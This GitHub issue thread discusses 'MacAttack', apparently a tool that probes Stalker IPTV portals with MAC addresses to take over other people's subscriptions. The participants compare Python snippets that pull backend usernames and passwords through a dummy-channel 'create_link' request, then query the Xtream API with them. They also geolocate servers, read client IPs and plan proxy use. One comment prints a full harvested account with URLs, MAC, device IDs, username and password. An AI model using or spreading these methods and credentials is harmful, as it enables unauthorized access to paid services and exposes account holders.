### ISSUE TITLE
Request

### ISSUE THREAD

**Issue by tunay87** [Evilvir-us/MacAttack#2]
First of all, I would like to thank you for the great tool. Would it be possible to get more detailed account information such as: Vpn needed , Location of Client and Multiple Connections allowed? Another suggestion would be when was the last hit generated( Date and Time).

If it were possible to implement one of these proposals, I would be very pleased. 

Thank you for your efforts.

**Comment by Evilvir-us** [comment]
It’s not really possible to use a MAC address to track a device’s location because MAC addresses don’t include location data and are mainly used for local network communication. I can return the location of the portal, but finding the exact location of the end user doesn’t seem likely.

As for max connections, Stalker portals don’t have that information since they act as middleware, connecting devices to the backend. If the backend is using something like Xtream Codes, we might be able to pull max connections from there. That said, most of them will probably show one max connection, since MAC addresses are unique to individual devices. It’s safe to assume that most Stalker portals allow just one connection per MAC.

Let me dig into this a bit more, and I’ll get back to you when I have the time!

**Comment by tunay87** [comment]
Unfortunately I have to correct you, I have python scripts that can read this information from Stalker, i.e. max connections or locations client and location server.  If you want, I can send you these Pys and you can implement it into your program. Please let me know, preferably by email.
![Screenshot_20241219_144837_QPython 3L](https://github.com/user-attachments/assets/0a928e45-c9bd-4263-8a65-3ff53f0c2dda)

**Comment by Evilvir-us** [comment]
Thank you for the clarification. If you’ve developed scripts that can retrieve this data from Stalker portals, I’d love to check them out. Please feel free to share them via email at macattack@evilvir.us.

I’ve already implemented the retrieval method for max connections using the Xtream API when the backend uses Xtream Codes. However, if your approach offers a better solution, I’m definitely interested in exploring it.

Once I’ve had a chance to review your scripts, I’ll look into how we can best integrate these features into the tool. I appreciate your willingness to contribute, this could be a great enhancement.

**Comment by Evilvir-us** [comment]
Got your email, I'll check it out once I finish work.

**Comment by Evilvir-us** [comment]
Hey, thanks for sending me the script! It was interesting to examine it and see how we approached things differently.

It seems like you're approaching it similarly to how I did, by using a dummy channel to gather the username and password from the backend. You then use that information with the Xtream Codes API to retrieve the maximum connections. Additionally, the way you're collecting the location info is also very much in line with my method.

Your code summarized:
```python
# Sets a URL with a dummy channel
# I noticed that you checked get_all_channels and used the 5th result to get a real channel number, this is a clever idea!
    url = "http://" + panel_url + "/" + portal_idx + "?type=itv&action=create_link&cmd=ffmpeg%20http://localhost/ch/" + str(cid) + "_&series=&fforced_storage=undefined&disable_ad=0&download=0&JsHttpRequest=1-xml"
# Gets the response from the URL
    res = ses.get(url, headers=hea2(panel_mac, token), timeout=15, verify=False)
    veri = str(res.text)
# Removes extra slashes from the response and splits it into sections
    link = veri.split('ffmpeg ')[1].split('"')[0].replace('\/', '/')
# Gets the username and password from the URL in the response
    user = str(link.replace('live/', '').split('/')[3])
    pas = str(link.replace('live/', '').split('/')[4])
# Creates a link to the Xtream API using the username and password
    if playerapi == "":
        playerlink = str("http://" + panel_url.replace('http://', '').replace('/c/', '') + "/player_api.php?username=" + user + "&password=" + pas)
# Runs the link through your function m3uapi and retrieves the data from the Xtream API
    playerapi = m3uapi(playerlink, panel_mac, token)
# Gathers the max and active connections from the JSON response
    acon = veri.split('active_cons":')[1]
    mcon = veri.split('max_connections":')[1]
```

My code summarized:
```
# Sets a URL with a dummy channel. 
# I just used channel 1, but I might swipe your idea later if I come across a portal where channel 1 doesn't return any results. as get_all_channels will add some processing time to the results.
    url4 = f"{self.base_url}/portal.php?type=itv&action=create_link&cmd=http://localhost/ch/1_&series=&forced_storage=undefined&disable_ad=0&download=0&JsHttpRequest=1-xml"
# Gets the response from the URL
    res4 = s.get(url4, timeout=25, allow_redirects=False)
# Splits the response URL by slashes
    path_parts = parsed_url.path.strip("/").split("/")
# I check if there are 3 or more sections to confirm a username and password are present, then extract the credentials from those parts
    if len(path_parts) >= 3:
        username = path_parts[0]
        password = path_parts[1]
# Creates a link to the Xtream API using the username and password
    xtream_url = f"{self.base_url}/player_api.php?username={username}&password={password}"
# Pulls the JSON response from that link
    resxtream = s.get(xtream_url, timeout=25, allow_redirects=False)
# Gathers the max and active connections from the JSON response
    active_cons = int(dataxtream["user_info"]["active_cons"])
    max_connections = int(dataxtream["user_info"]["max_connections"])
    created_at_timestamp = int(dataxtream["user_info"]["created_at"])
```


Country Info:

Looks like you got your country info from ipleak
```python
	check_url = f"https://ipleak.net/json/{host}"
    res = ses.get(check_url, timeout=15, verify=False)
	country_name = cont.split('country_name": "')[1]
	country_name = str((country_name.split('"')[0]).encode('utf-8').decode("unicode-escape"))
	scountry = cont.split('country_code": "')[1]
	scountry = scountry.split('"')[0]
```

I got my country info from ipinfo
```python
	url = f"https://ipinfo.io/{ip_address}/json"
	response = requests.get(url)
	data = response.json()
	return {
		"City": data.get("city"),
		"Country": data.get("country"),
		"Timezone": data.get("timezone"),
	}
```

It’s interesting that our country info doesn’t match. Here’s a comparison between different whois tools:

- https://ipleak.net/json/5.206.227.184 shows Portugal
- http://ip-api.com/json/5.206.227.184 shows Netherlands
- https://ipinfo.io/5.206.227.184/json shows Netherlands, but in a different region
- https://whois.domaintools.com/5.206.227.184 shows Netherlands (Amsterdam)

I'll stick to my method, as ipleak is the only WHOIS tool showing Portugal.

Streamtv Comparison:

Here’s a comparison of our current results using streamtv.to:

I noticed a few differences. Our device IDs are swapped; your deviceid is my deviceid2, and the other device IDs don’t match eachother. However, my hashes work so far on all of my tests, so I'll keep using them the way they are for now.

```
Real -> http://llllllllliiiiiiiiiiiiii.funtogether.xyz:8080/c/  
Panel -> http://evilvir.us.streamtv.to:8080/c/  
Mac -> 00:1A:79:B5:59:BD  
Exp -> January 31, 2025, 10:37 AM  
Host -> http://evilvir.us.streamtv.to:8080/c/  
Real -> http://llllllllliiiiiiiiiiiiii.funtogether.xyz:8080/c/  
Port -> 8080  
User -> 6pcyAdGQzT  
Pass -> ePLAFzsKa2  
Exp -> 31-01-2025 02:37:38  
Act Con -> 0  
Max Con -> 1  
Status -> Active  
TimeZone -> UTC  
m3uLink -> Offline  
Country -> Portugal * PT  
Server IP -> 5.206.227.184  
LiveTV -> 16445  
SN: AE3A1F0168C0E4879631CA25ACB8FF03  
SNCUT: AE3A1F0168C0E  
DEVICE ID1: 0E36B3885C15D4A2CD54ECBE6A5E7E997B5553944B31E5905F3057E3E8596706  
DEVICE ID2: 6D45938A0E2ADC1E039EC1CA12D764CBFDCCEAAE9E592E51DD31ED51B71FC213  
```

```python
Portal: http://evilvir.us.streamtv.to:8080/c/  
PortalIP: 5.206.227.184  
MAC Addr: 00:1A:79:B5:59:BD  
PortalIP: 5.206.227.184  
Location: Lelystad, NL  
Timezone: Europe/Amsterdam  
DeviceID: 762035A2189FD1E38BF20D257B64262DB5B446904D1DA3D6C36ACBC072CE374B  
SecondID: 0E36B3885C15D4A2CD54ECBE6A5E7E997B5553944B31E5905F3057E3E8596706  
Serial #: AE3A1F0168C0E  
Backend: http://llllllllliiiiiiiiiiiiii.funtogether.xyz:8080  
IP Addr: 193.109.136.14  
Location: Lelystad, NL  
Timezone: Europe/Amsterdam  
Username: 6pcyAdGQzT  
Password: ePLAFzsKa2  
Max Conn: 1  
Found on: December 20, 2024, 03:35 PM  
Creation: May 26, 2023, 10:29 AM  
Exp date: January 31, 2025, 10:37 AM  
Channels: 16445
```
Apologies, as there were no references to client location in your script and I didn’t see any methods for collecting the max connections aside from using the Xtream API.

Feel free to reach out if you'd like to discuss this further. And thanks again for sharing your script, I really enjoyed taking a look at it!

**Comment by Evilvir-us** [comment]
After examining your code again, I see you're checking the get_profile for the IP address to find the client's IP address.

Summarized code:
```python
# Code that tries to retrieve an ip address from the profile
		url2 = "http://" + panel_url + "/" + portal_idx + "?type=stb&action=get_profile&JsHttpRequest=1-xml"
		res = ses.get(url2, headers=hea2(panel_mac, token), timeout=10, verify=False)
		veri = str(res.text)
		ip = veri.split('ip": "')[1]
		ip = ip.split('"')[0]
		
# If the ip isnt empty
        if not ip == "":
# This function does not exist within your script, so if it did find an ip, you would get a name error.
            vpn = vpnip(ip)
# If the IP is empty
        else:
            vpn = "No client IP address."
```
Hey, have you had any success with this? I didn’t see any IP info in the profile, maybe some portals profiles are different. If you know of a portal that needs a specific IP, just let me know and I’ll give it a try!

here's my get_profile output:
`{"js":{"id":0,"name":0,"sname":"","pass":"","parent_password":"0000","bright":"200","contrast":"127","saturation":"127","video_out":"","volume":"70","playback_buffer_bytes":"0","playback_buffer_size":"0","audio_out":"1","mac":"00:1A:79:B5:59:BD","ls":"","version":"","lang":"","locale":"en_GB.utf8","city_id":"0","hd":"1","main_notify":"1","fav_itv_on":"0","now_playing_start":"2018-02-18 17:33:43","now_playing_type":"1","now_playing_content":"Test channel","additional_services_on":"1","time_last_play_tv":"0000-00-00 00:00:00","time_last_play_video":"0000-00-00 00:00:00","operator_id":"0","storage_name":"","hd_content":"0","image_version":"undefined","last_change_status":"0000-00-00 00:00:00","last_start":"2018-02-18 17:33:38","last_active":"2018-02-18 17:33:43","keep_alive":"2018-02-18 17:33:43","screensaver_delay":"10","phone":"","fname":"","login":"","password":"","stb_type":"","num_banks":"0","tariff_plan_id":"0","comment":null,"now_playing_link_id":"0","now_playing_streamer_id":"0","just_started":"1","last_watchdog":"2018-02-18 17:33:39","created":"2018-02-18 14:40:12","plasma_saving":"0","ts_enabled":"0","ts_enable_icon":"1","ts_path":"","ts_max_length":"3600","ts_buffer_use":"cyclic","ts_action_on_exit":"no_save","ts_delay":"on_pause","video_clock":"Off","verified":"0","hdmi_event_reaction":1,"pri_audio_lang":"","sec_audio_lang":"","pri_subtitle_lang":"","sec_subtitle_lang":"","subtitle_color":"16777215","subtitle_size":"20","show_after_loading":"","play_in_preview_by_ok":null,"hw_version":"undefined","openweathermap_city_id":"0","theme":"","settings_password":"0000","expire_billing_date":"0000-00-00 00:00:00","reseller_id":null,"account_balance":"","client_type":"STB","hw_version_2":"62","blocked":"0","units":"metric","tariff_expired_date":null,"tariff_id_instead_expired":null,"activation_code_auto_issue":"1","last_itv_id":0,"updated":{"id":"1","uid":"1","anec":"0","vclub":"0"},"rtsp_type":"4","rtsp_flags":"0","stb_lang":"en","display_menu_after_loading":"","record_max_length":180,"web_proxy_host":"","web_proxy_port":"","web_proxy_user":"","web_proxy_pass":"","web_proxy_exclude_list":"","demo_video_url":"","tv_quality_filter":"","is_moderator":false,"timeslot_ratio":0.33333333333333,"timeslot":40,"kinopoisk_rating":"1","enable_tariff_plans":"","strict_stb_type_check":"","cas_type":0,"cas_params":null,"cas_web_params":null,"cas_additional_params":[],"cas_hw_descrambling":0,"cas_ini_file":"","logarithm_volume_control":"","allow_subscription_from_stb":"1","deny_720p_gmode_on_mag200":"1","enable_arrow_keys_setpos":"1","show_purchased_filter":"","timezone_diff":0,"enable_connection_problem_indication":true,"invert_channel_switch_direction":"","play_in_preview_only_by_ok":false,"enable_stream_error_logging":"","always_enabled_subtitles":"1","enable_service_button":"","enable_setting_access_by_pass":"","tv_archive_continued":"","plasma_saving_timeout":"600","show_tv_only_hd_filter_option":"","tv_playback_retry_limit":"0","fading_tv_retry_timeout":"1","epg_update_time_range":0.6,"store_auth_data_on_stb":false,"account_page_by_password":"","tester":false,"enable_stream_losses_logging":"","external_payment_page_url":"","max_local_recordings":"10","tv_channel_default_aspect":"fit","default_led_level":"10","standby_led_level":"90","show_version_in_main_menu":"1","disable_youtube_for_mag200":"1","auth_access":false,"epg_data_block_period_for_stb":"5","standby_on_hdmi_off":"1","force_ch_link_check":"","stb_ntp_server":"pool.ntp.org","overwrite_stb_ntp_server":"","hide_tv_genres_in_fullscreen":null,"advert":null,"status":1,"update_url":"","test_download_url":"https:\/\/fast.com\/","default_timezone":"UTC","default_locale":"en_GB.utf8","allowed_stb_types":["aurahd","aurahd2","aurahd3","aurahd4","aurahd5","aurahd6","aurahd7","aurahd8","aurahd9","mag200","mag245","mag245d","mag250","mag254","mag255","mag256","mag257","mag260","mag270","mag275","mag322","mag323","mag324","mag325","mag349","mag350","mag351","mag352","mag410","mag412","mag420","mag420w1","mag424","mag425a","mag520","mag522","mag522","mag522v1","mag522v2","mag522w","mag522w1","mag522w2","mag522w3","mag524","mag524v1","mag524v2","mag524v3","mag540","mag540w","mag544","mag544w3","wr320"],"allowed_stb_types_for_local_recording":["aurahd","aurahd2","aurahd3","aurahd4","aurahd5","aurahd6","aurahd7","aurahd8","aurahd9","mag200","mag245","mag245d","mag250","mag254","mag255","mag256","mag257","mag260","mag270","mag275","mag322","mag323","mag324","mag325","mag349","mag350","mag351","mag352","mag410","mag412","mag420","mag420w1","mag424","mag425a","mag520","mag522","mag522","mag522v1","mag522v2","mag522w","mag522w1","mag522w2","mag522w3","mag524","mag524v1","mag524v2","mag524v3","mag540","mag540w","mag544","mag544w3","wr320"],"storages":[],"playback_limit":false,"enable_playback_limit":false,"show_tv_channel_logo":true,"show_channel_logo_in_preview":true,"hls_fast_start":"1","check_ssl_certificate":0,"enable_buffering_indication":1,"watchdog_timeout":84}}`

**Comment by Evilvir-us** [comment]
I've added the proxy IP to the outputs, indicating which proxy was used to connect to the portal. In the next update, I'll include the proxy location in the empty checkbox spot. This will help you identify the location to use, as the proxy successfully connected from there.

**Comment by tunay87** [comment]
A very intelligent move.Would it perhaps be possible to attach your txt files onto your programm. I mean the proxy servers. I'll send you another interesting proxy py .It finds working proxy servers. You are welcome to use it.
--
    Samstag, 21 Dezember 2024, 10:08PM +01:00 von Evilvirus  ***@***.*** :

**Comment by Evilvir-us** [comment]
After implementing support for stalker_portal/server/load.php, I observed that most of these profiles do include the client's IP address. I will add this to the output log.
